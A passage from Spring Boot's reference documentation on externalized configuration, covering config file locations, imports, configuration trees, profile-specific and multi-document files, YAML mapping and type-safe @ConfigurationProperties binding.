`optional:classpath:\/;optional:classpath:\/config\/`\n. `optional:file:.\/;optional:file:.\/config\/;optional:file:.\/config\/*\/`\n. `optional:classpath:custom-config\/`\n. 
`optional:file:.\/custom-config\/`\n\nThis search ordering lets you specify default values in one configuration file and then selectively override those values in another.\nYou can provide default values for your application in `application.properties` (or whatever other basename you choose with `spring.config.name`) in one of the default locations.\nThese default values can then be overridden at runtime with a different file located in one of the custom locations.\n\nNOTE: If you use environment variables rather than system properties, most operating systems disallow period-separated key names, but you can use underscores instead (for example, configprop:spring.config.name[format=envvar] instead of configprop:spring.config.name[]).\nSee <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>> for details.\n\nNOTE: If your application runs in a servlet container or application server, then JNDI properties (in `java:comp\/env`) or servlet context initialization parameters can be used instead of, or as well as, environment variables or system properties.\n\n\n\n[[features.external-config.files.optional-prefix]]\n==== Optional Locations\nBy default, when a specified config data location does not exist, Spring Boot will throw a `ConfigDataLocationNotFoundException` and your application will not start.\n\nIf you want to specify a location, but you do not mind if it does not always exist, you can use the `optional:` prefix.\nYou can use this prefix with the `spring.config.location` and `spring.config.additional-location` properties, as well as with <<features#features.external-config.files.importing, `spring.config.import`>> declarations.\n\nFor example, a `spring.config.import` value of `optional:file:.\/myconfig.properties` allows your application to start, even if the `myconfig.properties` file is missing.\n\nIf you want to ignore all `ConfigDataLocationNotFoundExceptions` and always continue to start your application, you can use the `spring.config.on-not-found` property.\nSet the value to `ignore` using `SpringApplication.setDefaultProperties(...)` or with a system\/environment variable.\n\n\n\n[[features.external-config.files.wildcard-locations]]\n==== Wildcard Locations\nIf a config file location includes the `{asterisk}` character for the last path segment, it is considered a wildcard location.\nWildcards are expanded when the config is loaded so that immediate subdirectories are also checked.\nWildcard locations are particularly useful in an environment such as Kubernetes when there are multiple sources of config properties.\n\nFor example, if you have some Redis configuration and some MySQL configuration, you might want to keep those two pieces of configuration separate, while requiring that both those are present in an `application.properties` file.\nThis might result in two separate `application.properties` files mounted at different locations such as `\/config\/redis\/application.properties` and `\/config\/mysql\/application.properties`.\nIn such a case, having a wildcard location of `config\/*\/`, will result in both files being processed.\n\nBy default, Spring Boot includes `config\/*\/` in the default search locations.\nIt means that all subdirectories of the `\/config` directory outside of your jar will be searched.\n\nYou can use wildcard locations yourself with the `spring.config.location` and `spring.config.additional-location` properties.\n\nNOTE: A wildcard location must contain only one `{asterisk}` and end with 
`{asterisk}\/` for search locations that are directories or `*\/<filename>` for search locations that are files.\nLocations with wildcards are sorted alphabetically based on the absolute path of the file names.\n\nTIP: Wildcard locations only work with external directories.\nYou cannot use a wildcard in a `classpath:` location.\n\n\n\n[[features.external-config.files.profile-specific]]\n==== Profile Specific Files\nAs well as `application` property files, Spring Boot will also attempt to load profile-specific files using the naming convention `application-\\{profile}`.\nFor example, if your application activates a profile named `prod` and uses YAML files, then both `application.yml` and `application-prod.yml` will be considered.\n\nProfile-specific properties are loaded from the same locations as standard `application.properties`, with profile-specific files always overriding the non-specific ones.\nIf several profiles are specified, a last-wins strategy applies.\nFor example, if profiles `prod,live` are specified by the configprop:spring.profiles.active[] property, values in `application-prod.properties` can be overridden by those in `application-live.properties`.\n\n[NOTE]\n====\nThe last-wins strategy applies at the <<features#features.external-config.files.location-groups,location group>> level.\nA configprop:spring.config.location[] of `classpath:\/cfg\/,classpath:\/ext\/` will not have the same override rules as `classpath:\/cfg\/;classpath:\/ext\/`.\n\nFor example, continuing our `prod,live` example above, we might have the following files:\n\n----\n\/cfg\n application-live.properties\n\/ext\n application-live.properties\n application-prod.properties\n----\n\nWhen we have a configprop:spring.config.location[] of `classpath:\/cfg\/,classpath:\/ext\/` we process all `\/cfg` files before all `\/ext` files:\n\n. `\/cfg\/application-live.properties`\n. `\/ext\/application-prod.properties`\n. `\/ext\/application-live.properties`\n\n\nWhen we have `classpath:\/cfg\/;classpath:\/ext\/` instead (with a `;` delimiter) we process `\/cfg` and `\/ext` at the same level:\n\n. `\/ext\/application-prod.properties`\n. `\/cfg\/application-live.properties`\n. 
`/ext/application-live.properties`
====

The `Environment` has a set of default profiles (by default, `[default]`) that are used if no active profiles are set.
In other words, if no profiles are explicitly activated, then properties from `application-default` are considered.

NOTE: Properties files are only ever loaded once.
If you have already directly <<features#features.external-config.files.importing,imported>> a profile-specific property file then it will not be imported a second time.



[[features.external-config.files.importing]]
==== Importing Additional Data
Application properties may import further config data from other locations using the `spring.config.import` property.
Imports are processed as they are discovered, and are treated as additional documents inserted immediately below the one that declares the import.

For example, you might have the following in your classpath `application.properties` file:

[source,yaml,indent=0,subs="verbatim",configblocks]
----
	spring:
	  application:
	    name: "myapp"
	  config:
	    import: "optional:file:./dev.properties"
----

This will trigger the import of a `dev.properties` file in the current directory (if such a file exists).
Values from the imported `dev.properties` will take precedence over the file that triggered the import.
In the above example, the `dev.properties` could redefine `spring.application.name` to a different value.

An import will only be imported once no matter how many times it is declared.
The order an import is defined inside a single document within the properties/yaml file does not matter.
For instance, the two examples below produce the same result:

[source,yaml,indent=0,subs="verbatim",configblocks]
----
	spring:
	  config:
	    import: "my.properties"
	my:
	  property: "value"
----

[source,yaml,indent=0,subs="verbatim",configblocks]
----
	my:
	  property: "value"
	spring:
	  config:
	    import: "my.properties"
----

In both of the above examples, the values from the `my.properties` file will take precedence over the file that triggered its import.

Several locations can be specified under a single `spring.config.import` key.
Locations will be processed in the order that they are defined, with later imports taking precedence; see the short sketch at the end of this section.

NOTE: When appropriate, <<features#features.external-config.files.profile-specific, Profile-specific variants>> are also considered for import.
The example above would import both `my.properties` as well as any `my-<profile>.properties` variants.

[TIP]
====
Spring Boot includes a pluggable API that allows various different location addresses to be supported.
By default you can import Java Properties, YAML and "`<<features#features.external-config.files.configtree, configuration trees>>`".

Third-party jars can offer support for additional technologies (there is no requirement for files to be local).
For example, you can imagine config data being from external stores such as Consul, Apache ZooKeeper or Netflix Archaius.

If you want to support your own locations, see the `ConfigDataLocationResolver` and `ConfigDataLoader` classes in the `org.springframework.boot.context.config` package.
====
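
As a concrete sketch of that ordering (the file names here are hypothetical), the following declares two imports, and values from `override.properties` win over values from `base.properties`:

[source,yaml,indent=0,subs="verbatim",configblocks]
----
	spring:
	  config:
	    import: "optional:file:./base.properties,optional:file:./override.properties"
----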
putting an extension hint in square brackets.

For example, suppose you have a `/etc/config/myconfig` file that you wish to import as yaml.
You can import it from your `application.properties` using the following:

[source,yaml,indent=0,subs="verbatim",configprops,configblocks]
----
	spring:
	  config:
	    import: "file:/etc/config/myconfig[.yaml]"
----



[[features.external-config.files.configtree]]
==== Using Configuration Trees
When running applications on a cloud platform (such as Kubernetes) you often need to read config values that the platform supplies.
It is not uncommon to use environment variables for such purposes, but this can have drawbacks, especially if the value is supposed to be kept secret.

As an alternative to environment variables, many cloud platforms now allow you to map configuration into mounted data volumes.
For example, Kubernetes can volume mount both https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/#populate-a-volume-with-data-stored-in-a-configmap[`ConfigMaps`] and https://kubernetes.io/docs/concepts/configuration/secret/#using-secrets-as-files-from-a-pod[`Secrets`].

There are two common volume mount patterns that can be used:

. A single file contains a complete set of properties (usually written as YAML).
. Multiple files are written to a directory tree, with the filename becoming the '`key`' and the contents becoming the '`value`'.

For the first case, you can import the YAML or Properties file directly using `spring.config.import` as described <<features#features.external-config.files.importing,above>>.
For the second case, you need to use the `configtree:` prefix so that Spring Boot knows it needs to expose all the files as properties.

As an example, let's imagine that Kubernetes has mounted the following volume:

[indent=0]
----
	etc/
	  config/
	    myapp/
	      username
	      password
----

The contents of the `username` file would be a config value, and the contents of `password` would be a secret.

To import these properties, you can add the following to your `application.properties` or `application.yaml` file:

[source,yaml,indent=0,subs="verbatim",configprops,configblocks]
----
	spring:
	  config:
	    import: "optional:configtree:/etc/config/"
----

You can then access or inject `myapp.username` and `myapp.password` properties from the `Environment` in the usual way.

TIP: The folders under the config tree form the property name.
In the above example, to access the properties as `username` and `password`, you can set `spring.config.import` to `optional:configtree:/etc/config/myapp`.

NOTE: Filenames with dot notation are also correctly mapped.
For example, in the above example, a file named `myapp.username` in `/etc/config` would result in a `myapp.username` property in the `Environment`.

TIP: Configuration tree values can be bound to both `String` and `byte[]` types depending on the contents expected.
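
For instance, injecting the two values from the example above might look like the following sketch (the class name is illustrative):

[source,java]
----
@Component
public class MyAppCredentials {

	private final String username;

	private final String password;

	MyAppCredentials(@Value("${myapp.username}") String username,
			@Value("${myapp.password}") String password) {
		this.username = username;
		this.password = password;
	}

}
----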
location:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"optional:configtree:\/etc\/config\/*\/\"\n----\n\nThis will add `db.username`, `db.password`, `mq.username` and `mq.password` properties.\n\nNOTE: Directories loaded using a wildcard are sorted alphabetically.\nIf you need a different order, then you should list each location as a separate import\n\n\nConfiguration trees can also be used for Docker secrets.\nWhen a Docker swarm service is granted access to a secret, the secret gets mounted into the container.\nFor example, if a secret named `db.password` is mounted at location `\/run\/secrets\/`, you can make `db.password` available to the Spring environment using the following:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"optional:configtree:\/run\/secrets\/\"\n----\n\n\n\n[[features.external-config.files.property-placeholders]]\n==== Property Placeholders\nThe values in `application.properties` and `application.yml` are filtered through the existing `Environment` when they are used, so you can refer back to previously defined values (for example, from System properties or environment variables).\nThe standard `$\\{name}` property-placeholder syntax can be used anywhere within a value.\nProperty placeholders can also specify a default value using a `:` to separate the default value from the property name, for example `${name:default}`.\n\nThe use of placeholders with and without defaults is shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tapp:\n\t name: \"MyApp\"\n\t description: \"${app.name} is a Spring Boot application written by ${username:Unknown}\"\n----\n\nAssuming that the `username` property has not been set elsewhere, `app.description` will have the value `MyApp is a Spring Boot application written by Unknown`.\n\n[NOTE]\n====\nYou should always refer to property names in the placeholder using their canonical form (kebab-case using only lowercase letters).\nThis will allow Spring Boot to use the same logic as it does when <<features#features.external-config.typesafe-configuration-properties.relaxed-binding, relaxed binding>> `@ConfigurationProperties`.\n\nFor example, `${demo.item-price}` will pick up `demo.item-price` and `demo.itemPrice` forms from the `application.properties` file, as well as `DEMO_ITEMPRICE` from the system environment.\nIf you used `${demo.itemPrice}` instead, `demo.item-price` and `DEMO_ITEMPRICE` would not be considered.\n====\n\nTIP: You can also use this technique to create \"`short`\" variants of existing Spring Boot properties.\nSee the _<<howto#howto.properties-and-configuration.short-command-line-arguments>>_ how-to for details.\n\n\n\n[[features.external-config.files.multi-document]]\n==== Working with Multi-Document Files\nSpring Boot allows you to split a single physical file into multiple logical documents which are each added independently.\nDocuments are processed in order, from top to bottom.\nLater documents can override the properties defined in earlier ones.\n\nFor `application.yml` files, the standard YAML multi-document syntax is used.\nThree consecutive hyphens represent the end of one document, and the start of the next.\n\nFor example, the following file has two logical documents:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\tspring:\n\t application:\n\t name: \"MyApp\"\n\t---\n\tspring:\n\t application:\n\t name: \"MyCloudApp\"\n\t config:\n\t 
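# this document applies only when the activation criteria below match\n\t 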
activate:\n\t on-cloud-platform: \"kubernetes\"\n----\n\nFor `application.properties` files a special `#---` comment is used to mark the document splits:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tspring.application.name=MyApp\n\t#---\n\tspring.application.name=MyCloudApp\n\tspring.config.activate.on-cloud-platform=kubernetes\n----\n\nNOTE: Property file separators must not have any leading whitespace and must have exactly three hyphen characters.\nThe lines immediately before and after the separator must not be comments.\n\nTIP: Multi-document property files are often used in conjunction with activation properties such as `spring.config.activate.on-profile`.\nSee the <<features#features.external-config.files.activation-properties, next section>> for details.\n\nWARNING: Multi-document property files cannot be loaded by using the `@PropertySource` or `@TestPropertySource` annotations.\n\n\n\n[[features.external-config.files.activation-properties]]\n==== Activation Properties\nIt is sometimes useful to only activate a given set of properties when certain conditions are met.\nFor example, you might have properties that are only relevant when a specific profile is active.\n\nYou can conditionally activate a properties document using `spring.config.activate.*`.\n\nThe following activation properties are available:\n\n.activation properties\n[cols=\"1,4\"]\n|===\n| Property | Note\n\n| `on-profile`\n| A profile expression that must match for the document to be active.\n\n| `on-cloud-platform`\n| The `CloudPlatform` that must be detected for the document to be active.\n|===\n\nFor example, the following specifies that the second document is only active when running on Kubernetes, and only when either the \"`prod`\" or \"`staging`\" profiles are active:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmyprop:\n\t \"always-set\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-cloud-platform: \"kubernetes\"\n\t on-profile: \"prod | staging\"\n\tmyotherprop: \"sometimes-set\"\n----\n\n\n\n[[features.external-config.encrypting]]\n=== Encrypting Properties\nSpring Boot does not provide any built in support for encrypting property values, however, it does provide the hook points necessary to modify values contained in the Spring `Environment`.\nThe `EnvironmentPostProcessor` interface allows you to manipulate the `Environment` before the application starts.\nSee <<howto#howto.application.customize-the-environment-or-application-context>> for details.\n\nIf you need a secure way to store credentials and passwords, the https:\/\/cloud.spring.io\/spring-cloud-vault\/[Spring Cloud Vault] project provides support for storing externalized configuration in https:\/\/www.vaultproject.io\/[HashiCorp Vault].\n\n\n\n[[features.external-config.yaml]]\n=== Working with YAML\nhttps:\/\/yaml.org[YAML] is a superset of JSON and, as such, is a convenient format for specifying hierarchical configuration data.\nThe `SpringApplication` class automatically supports YAML as an alternative to properties whenever you have the https:\/\/bitbucket.org\/asomov\/snakeyaml[SnakeYAML] library on your classpath.\n\nNOTE: If you use \"`Starters`\", SnakeYAML is automatically provided by `spring-boot-starter`.\n\n\n\n[[features.external-config.yaml.mapping-to-properties]]\n==== Mapping YAML to Properties\nYAML documents need to be converted from their hierarchical format to a flat structure that can be used with the Spring `Environment`.\nFor example, consider the following YAML 
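document, shown after a short aside.\n\nBefore that, here is a minimal sketch of the `EnvironmentPostProcessor` hook mentioned in the encryption section above (the class name and `decrypt` helper are hypothetical; implementations are registered in `META-INF\/spring.factories` under the `org.springframework.boot.env.EnvironmentPostProcessor` key):\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport java.util.Map;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.env.EnvironmentPostProcessor;\n\timport org.springframework.core.env.ConfigurableEnvironment;\n\timport org.springframework.core.env.MapPropertySource;\n\n\tpublic class DecryptingEnvironmentPostProcessor implements EnvironmentPostProcessor {\n\n\t\t@Override\n\t\tpublic void postProcessEnvironment(ConfigurableEnvironment environment, SpringApplication application) {\n\t\t\tString encrypted = environment.getProperty(\"my.secret\");\n\t\t\tif (encrypted != null) {\n\t\t\t\t\/\/ decrypt(...) is a placeholder for your own crypto\n\t\t\t\tMap<String, Object> decrypted = Map.of(\"my.secret\", decrypt(encrypted));\n\t\t\t\tenvironment.getPropertySources().addFirst(new MapPropertySource(\"decrypted\", decrypted));\n\t\t\t}\n\t\t}\n\n\t\tprivate String decrypt(String value) {\n\t\t\treturn value;\n\t\t}\n\n\t}\n----\n\nNow the YAML 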
document:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\tenvironments:\n\t dev:\n\t url: \"https:\/\/dev.example.com\"\n\t name: \"Developer Setup\"\n\t prod:\n\t url: \"https:\/\/another.example.com\"\n\t name: \"My Cool App\"\n----\n\nTo access these properties from the `Environment`, they would be flattened as follows:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tenvironments.dev.url=https:\/\/dev.example.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=https:\/\/another.example.com\n\tenvironments.prod.name=My Cool App\n----\n\nLikewise, YAML lists also need to be flattened.\nThey are represented as property keys with `[index]` dereferencers.\nFor example, consider the following YAML:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\t my:\n\t servers:\n\t - \"dev.example.com\"\n\t - \"another.example.com\"\n----\n\nThe preceding example would be transformed into these properties:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tmy.servers[0]=dev.example.com\n\tmy.servers[1]=another.example.com\n----\n\nTIP: Properties that use the `[index]` notation can be bound to Java `List` or `Set` objects using Spring Boot's `Binder` class.\nFor more details, see the \"`<<features#features.external-config.typesafe-configuration-properties>>`\" section below.\n\nWARNING: YAML files cannot be loaded by using the `@PropertySource` or `@TestPropertySource` annotations.\nSo, if you need to load values that way, use a properties file.\n\n\n\n[[features.external-config.yaml.directly-loading]]\n==== Directly Loading YAML\nSpring Framework provides two convenient classes that can be used to load YAML documents.\nThe `YamlPropertiesFactoryBean` loads YAML as `Properties` and the `YamlMapFactoryBean` loads YAML as a `Map`.\n\nYou can also use the `YamlPropertySourceLoader` class if you want to load YAML as a Spring `PropertySource`.\n\n\n\n[[features.external-config.random-values]]\n=== Configuring Random Values\nThe `RandomValuePropertySource` is useful for injecting random values (for example, into secrets or test cases).\nIt can produce integers, longs, uuids, or strings, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t secret: \"${random.value}\"\n\t number: \"${random.int}\"\n\t bignumber: \"${random.long}\"\n\t uuid: \"${random.uuid}\"\n\t number-less-than-ten: \"${random.int(10)}\"\n\t number-in-range: \"${random.int[1024,65536]}\"\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any character and `value,max` are integers.\nIf `max` is provided, then `value` is the minimum value and `max` is the maximum value (exclusive).\n\n\n\n[[features.external-config.system-environment]]\n=== Configuring System Environment Properties\nSpring Boot supports setting a prefix for environment properties.\nThis is useful if the system environment is shared by multiple Spring Boot applications with different configuration requirements.\nThe prefix for system environment properties can be set directly on `SpringApplication`.\n\nFor example, if you set the prefix to `input`, a property such as `remote.timeout` will also be resolved as `input.remote.timeout` in the system environment.
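\n\nSetting the prefix might look like the following sketch (`MyApplication` is a placeholder for your main class; the prefix is applied through the `setEnvironmentPrefix` method on `SpringApplication`):\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication\n\tpublic class MyApplication {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication application = new SpringApplication(MyApplication.class);\n\t\t\t\/\/ remote.timeout will also be resolved as input.remote.timeout\n\t\t\tapplication.setEnvironmentPrefix(\"input\");\n\t\t\tapplication.run(args);\n\t\t}\n\n\t}\n----\n\n\n\n[[features.external-config.typesafe-configuration-properties]]\n=== Type-safe Configuration Properties\nUsing the `@Value(\"$\\{property}\")` annotation to inject configuration properties can 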
sometimes be cumbersome, especially if you are working with multiple properties or your data is hierarchical in nature.\nSpring Boot provides an alternative method of working with properties that lets strongly typed beans govern and validate the configuration of your application.\n\nTIP: See also the <<features#features.external-config.typesafe-configuration-properties.vs-value-annotation,differences between `@Value` and type-safe configuration properties>>.\n\n\n\n[[features.external-config.typesafe-configuration-properties.java-bean-binding]]\n==== JavaBean properties binding\nIt is possible to bind a bean declaring standard JavaBean properties as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/javabeanbinding\/MyProperties.java[]\n----\n\nThe preceding POJO defines the following properties:\n\n* `my.service.enabled`, with a value of `false` by default.\n* `my.service.remote-address`, with a type that can be coerced from `String`.\n* `my.service.security.username`, with a nested \"security\" object whose name is determined by the name of the property.\n In particular, the type is not used at all there and could have been `SecurityProperties`.\n* `my.service.security.password`.\n* `my.service.security.roles`, with a collection of `String` that defaults to `USER`.\n\nNOTE: The properties that map to `@ConfigurationProperties` classes available in Spring Boot, which are configured through properties files, YAML files, environment variables, and other mechanisms, are public API but the accessors (getters\/setters) of the class itself are not meant to be used directly.\n\n[NOTE]\n====\nSuch arrangement relies on a default empty constructor and getters and setters are usually mandatory, since binding is through standard Java Beans property descriptors, just like in Spring MVC.\nA setter may be omitted in the following cases:\n\n* Maps, as long as they are initialized, need a getter but not necessarily a setter, since they can be mutated by the binder.\n* Collections and arrays can be accessed either through an index (typically with YAML) or by using a single comma-separated value (properties).\n In the latter case, a setter is mandatory.\n We recommend to always add a setter for such types.\n If you initialize a collection, make sure it is not immutable (as in the preceding example).\n* If nested POJO properties are initialized (like the `Security` field in the preceding example), a setter is not required.\n If you want the binder to create the instance on the fly by using its default constructor, you need a setter.\n\nSome people use Project Lombok to add getters and setters automatically.\nMake sure that Lombok does not generate any particular constructor for such a type, as it is used automatically by the container to instantiate the object.\n\nFinally, only standard Java Bean properties are considered and binding on static properties is not supported.\n====\n\n\n\n[[features.external-config.typesafe-configuration-properties.constructor-binding]]\n==== Constructor binding\nThe example in the previous section can be rewritten in an immutable fashion as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/constructorbinding\/MyProperties.java[]\n----\n\nIn this setup, the `@ConstructorBinding` annotation is used to indicate that constructor binding should be used.\nThis 
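tells the binder to bind through the constructor rather than through getters and setters.\n\nSuch a class might look roughly like the following sketch (field names are carried over from the JavaBean property list described in the previous section):\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport java.net.InetAddress;\n\timport java.util.List;\n\n\timport org.springframework.boot.context.properties.ConfigurationProperties;\n\timport org.springframework.boot.context.properties.ConstructorBinding;\n\timport org.springframework.boot.context.properties.bind.DefaultValue;\n\n\t@ConstructorBinding\n\t@ConfigurationProperties(\"my.service\")\n\tpublic class MyProperties {\n\n\t\tprivate final boolean enabled;\n\n\t\tprivate final InetAddress remoteAddress;\n\n\t\tprivate final Security security;\n\n\t\tpublic MyProperties(boolean enabled, InetAddress remoteAddress, Security security) {\n\t\t\tthis.enabled = enabled;\n\t\t\tthis.remoteAddress = remoteAddress;\n\t\t\tthis.security = security;\n\t\t}\n\n\t\t\/\/ getters omitted in this sketch; no setters are needed\n\n\t\tpublic static class Security {\n\n\t\t\tprivate final String username;\n\n\t\t\tprivate final String password;\n\n\t\t\tprivate final List<String> roles;\n\n\t\t\tpublic Security(String username, String password, @DefaultValue(\"USER\") List<String> roles) {\n\t\t\t\tthis.username = username;\n\t\t\t\tthis.password = password;\n\t\t\t\tthis.roles = roles;\n\t\t\t}\n\n\t\t\t\/\/ getters omitted in this sketch\n\n\t\t}\n\n\t}\n----\n\nIn effect, the annotation 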
means that the binder will expect to find a constructor with the parameters that you wish to have bound.\nIf you are using Java 16 or later, constructor binding can be used with records.\nIn this case, unless your record has multiple constructors, there is no need to use `@ConstructorBinding`.\n\nNested members of a `@ConstructorBinding` class (such as `Security` in the example above) will also be bound through their constructor.\n\nDefault values can be specified using `@DefaultValue` on a constructor parameter or, when using Java 16 or later, a record component.\nThe conversion service will be applied to coerce the `String` value to the target type of a missing property.\n\nReferring to the previous example, if no properties are bound to `Security`, the `MyProperties` instance will contain a `null` value for `security`.\nIf you wish to return a non-null instance of `Security` even when no properties are bound to it, you can use an empty `@DefaultValue` annotation to do so:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/constructorbinding\/nonnull\/MyProperties.java[tag=*]\n----\n\n\nNOTE: To use constructor binding, the class must be enabled using `@EnableConfigurationProperties` or configuration property scanning.\nYou cannot use constructor binding with beans that are created by the regular Spring mechanisms (for example, `@Component` beans, beans created by using `@Bean` methods or beans loaded by using `@Import`).\n\nTIP: If you have more than one constructor for your class, you can also use `@ConstructorBinding` directly on the constructor that should be bound.\n\nNOTE: The use of `java.util.Optional` with `@ConfigurationProperties` is not recommended as it is primarily intended for use as a return type.\nAs such, it is not well-suited to configuration property injection.\nFor consistency with properties of other types, if you do declare an `Optional` property and it has no value, `null` rather than an empty `Optional` will be bound.\n\n\n\n[[features.external-config.typesafe-configuration-properties.enabling-annotated-types]]\n==== Enabling @ConfigurationProperties-annotated types\nSpring Boot provides infrastructure to bind `@ConfigurationProperties` types and register them as beans.\nYou can either enable configuration properties on a class-by-class basis or enable configuration property scanning that works in a similar manner to component scanning.\n\nSometimes, classes annotated with `@ConfigurationProperties` might not be suitable for scanning, for example, if you're developing your own auto-configuration or you want to enable them conditionally.\nIn these cases, specify the list of types to process using the `@EnableConfigurationProperties` annotation.\nThis can be done on any `@Configuration` class, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/enablingannotatedtypes\/MyConfiguration.java[]\n----
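\n\nA minimal such configuration class might look like this sketch (`SomeProperties` stands for any `@ConfigurationProperties`-annotated type):\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport org.springframework.boot.context.properties.EnableConfigurationProperties;\n\timport org.springframework.context.annotation.Configuration;\n\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableConfigurationProperties(SomeProperties.class)\n\tpublic class MyConfiguration {\n\n\t}\n----\n\nTo use configuration property scanning, add the `@ConfigurationPropertiesScan` annotation to your application.\nTypically, it is added to the main application class that is annotated with `@SpringBootApplication` but it can be added to any `@Configuration` class.\nBy default, scanning will occur from the package of the class that declares the annotation.\nIf you want to define specific packages to scan, you can do so as shown in the following 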
example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/enablingannotatedtypes\/MyApplication.java[]\n----\n\n[NOTE]\n====\nWhen the `@ConfigurationProperties` bean is registered using configuration property scanning or through `@EnableConfigurationProperties`, the bean has a conventional name: `<prefix>-<fqn>`, where `<prefix>` is the environment key prefix specified in the `@ConfigurationProperties` annotation and `<fqn>` is the fully qualified name of the bean.\nIf the annotation does not provide any prefix, only the fully qualified name of the bean is used.\n\nThe bean name in the example above is `com.example.app-com.example.app.SomeProperties`.\n====\n\nWe recommend that `@ConfigurationProperties` only deal with the environment and, in particular, does not inject other beans from the context.\nFor corner cases, setter injection can be used or any of the `*Aware` interfaces provided by the framework (such as `EnvironmentAware` if you need access to the `Environment`).\nIf you still want to inject other beans using the constructor, the configuration properties bean must be annotated with `@Component` and use JavaBean-based property binding.\n\n\n\n[[features.external-config.typesafe-configuration-properties.using-annotated-types]]\n==== Using @ConfigurationProperties-annotated types\nThis style of configuration works particularly well with the `SpringApplication` external YAML configuration, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\tmy:\n\t service:\n\t remote-address: 192.168.1.1\n\t security:\n\t username: \"admin\"\n\t roles:\n\t - \"USER\"\n\t - \"ADMIN\"\n----\n\nTo work with `@ConfigurationProperties` beans, you can inject them in the same way as any other bean, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/usingannotatedtypes\/MyService.java[]\n----\n\nTIP: Using `@ConfigurationProperties` also lets you generate metadata files that can be used by IDEs to offer auto-completion for your own keys.\nSee the <<configuration-metadata#appendix.configuration-metadata,appendix>> for details.\n\n\n\n[[features.external-config.typesafe-configuration-properties.third-party-configuration]]\n==== Third-party Configuration\nAs well as using `@ConfigurationProperties` to annotate a class, you can also use it on public `@Bean` methods.\nDoing so can be particularly useful when you want to bind properties to third-party components that are outside of your control.\n\nTo configure a bean from the `Environment` properties, add `@ConfigurationProperties` to its bean registration, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/thirdpartyconfiguration\/ThirdPartyConfiguration.java[]\n----\n\nAny JavaBean property defined with the `another` prefix is mapped onto that `AnotherComponent` bean in manner similar to the preceding `SomeProperties` example.\n\n\n\n[[features.external-config.typesafe-configuration-properties.relaxed-binding]]\n==== Relaxed Binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to `@ConfigurationProperties` beans, so there does not need to be an exact match between the `Environment` property name and the bean property name.\nCommon examples where this is useful include dash-separated 
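environment properties.\n\nBefore those details, here is a sketch of the third-party pattern from the previous section, declared in any `@Configuration` class (`AnotherComponent` stands for any class outside of your control):\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix = \"another\")\n\tpublic AnotherComponent anotherComponent() {\n\t\treturn new AnotherComponent();\n\t}\n----\n\nReturning to relaxed binding, common examples where it is useful include dash-separated 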
environment properties (for example, `context-path` binds to `contextPath`), and capitalized environment properties (for example, `PORT` binds to `port`).\n\nAs an example, consider the following `@ConfigurationProperties` class:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/relaxedbinding\/MyPersonProperties.java[]\n----\n\nWith the preceding code, the following properties names can all be used:\n\n.relaxed binding\n[cols=\"1,4\"]\n|===\n| Property | Note\n\n| `my.main-project.person.first-name`\n| Kebab case, which is recommended for use in `.properties` and `.yml` files.\n\n| `my.main-project.person.firstName`\n| Standard camel case syntax.\n\n| `my.main-project.person.first_name`\n| Underscore notation, which is an alternative format for use in `.properties` and `.yml` files.\n\n| `MY_MAINPROJECT_PERSON_FIRSTNAME`\n| Upper case format, which is recommended when using system environment variables.\n|===\n\nNOTE: The `prefix` value for the annotation _must_ be in kebab case (lowercase and separated by `-`, such as `my.main-project.person`).\n\n.relaxed binding rules per property source\n[cols=\"2,4,4\"]\n|===\n| Property Source | Simple | List\n\n| Properties Files\n| Camel case, kebab case, or underscore notation\n| Standard list syntax using `[ ]` or comma-separated values\n\n| YAML Files\n| Camel case, kebab case, or underscore notation\n| Standard YAML list syntax or comma-separated values\n\n| Environment Variables\n| Upper case format with underscore as the delimiter (see 